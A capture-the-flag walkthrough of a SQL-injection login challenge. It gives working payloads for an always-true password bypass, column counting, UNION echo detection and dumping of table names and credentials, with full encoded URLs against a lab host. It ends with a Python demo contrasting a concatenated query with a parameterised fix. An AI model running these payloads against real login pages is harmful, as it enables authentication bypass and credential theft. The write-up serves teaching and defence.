1. Open the challenge environment and try the universal-password payloads
1' or 1=1 #
1" or 1=1 #
The single-quote version works, so this is a single-quote (string-context) injection.
Login succeeds and the page returns one MD5 value.
2. Determine the number of columns
Because the browser URL-encodes/decodes what is typed into the address bar, and a bare # would start the URL fragment and never reach the server, the payload 1' order by 3 # entered at first
has to be encoded once, as 1' order by 3 %23
http://f3431d80-bec3-4bf7-bb3a-17c97b40ab41.node4.buuoj.cn:81/check.php?username=admin&password=1' order by 3 %23
This produces output; entering 4 instead gives an error, so the login query selects only 3 columns.
3. UNION query to find the injection point (the echoed column)
1' union select 1,2,3 #
1' union select 1,2,3 %23
http://f3431d80-bec3-4bf7-bb3a-17c97b40ab41.node4.buuoj.cn:81/check.php?username=admin&password=%27%20union%20select%201,2,3%20%23
The injection point is the third column, i.e. column 3 is the one echoed on the page.
4. Dump the database name
1' union select 1,2,database() %23
http://f3431d80-bec3-4bf7-bb3a-17c97b40ab41.node4.buuoj.cn:81/check.php?username=admin&password=1%27%20union%20select%201,2,database()%20%23
The database name is geek.
5. Dump the table names
1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek' %23
http://f3431d80-bec3-4bf7-bb3a-17c97b40ab41.node4.buuoj.cn:81/check.php?username=admin&password=1%27%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27geek%27%20%23
Two table names are returned.
6. Dump the column names
1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1' #
http://f3431d80-bec3-4bf7-bb3a-17c97b40ab41.node4.buuoj.cn:81/check.php?username=admin&password=1%27%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27l0ve1ysq1%27%20%23
The column names are returned.
7. Dump the column contents
1' union select 1,2,group_concat(id,username,password) from geek.l0ve1ysq1 %23
f3431d80-bec3-4bf7-bb3a-17c97b40ab41.node4.buuoj.cn:81/check.php?username=admin&password=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1 %23
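The whole chain above works only because check.php builds its login query by concatenating the username and password into SQL text. The following is an added example, not code from the challenge or its author: it rebuilds the login check in Python over an in-memory SQLite table (constructed sample data, a placeholder user with md5("password")), once by string concatenation the way the vulnerable page evidently does, and once with bound parameters. The universal password from step 1 bypasses the first and not the second; the double-quote variant from step 1 fails against both, which is how the single-quote context was identified. SQLite uses -- for line comments where the page's MySQL payload uses #, so the payload here ends in -- instead.

```python
import hashlib
import sqlite3

# Constructed sample data, not from the challenge: one user with a placeholder MD5 hash.
SAMPLE_USERS = [(1, "admin", hashlib.md5(b"password").hexdigest())]


def make_db():
    """Build an in-memory table shaped like the one the challenge queries."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def login_concat(conn, username, password):
    """Vulnerable: the password text is pasted into the SQL string, so a quote
    inside it closes the literal and the rest is parsed as SQL."""
    sql = (
        "SELECT id, username, password FROM users "
        f"WHERE username='{username}' AND password='{password}'"
    )
    return conn.execute(sql).fetchone() is not None


def login_param(conn, username, password):
    """Hardened: placeholders hand the values to the driver as data, so quotes
    and comment markers in the password never change the query structure."""
    sql = "SELECT id, username, password FROM users WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def demo():
    """Run the page's step-1 probes against both implementations."""
    conn = make_db()
    single_quote = "1' or 1=1 -- "   # page payload, SQLite comment syntax instead of #
    double_quote = '1" or 1=1 -- '   # page's other probe; no effect in a single-quoted literal
    real_hash = hashlib.md5(b"password").hexdigest()
    return {
        "concat_single_quote": login_concat(conn, "admin", single_quote),  # True: bypassed
        "concat_double_quote": login_concat(conn, "admin", double_quote),  # False: stays a string
        "param_single_quote": login_param(conn, "admin", single_quote),    # False: treated as data
        "param_real_password": login_param(conn, "admin", real_hash),      # True: normal login
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {'login OK' if ok else 'login rejected'}")
```

The parameterised version is the fix the challenge is pointing at: with `?` placeholders the UNION, ORDER BY and information_schema steps in sections 2 to 7 have nothing to attach to, because the submitted text can no longer terminate the string literal.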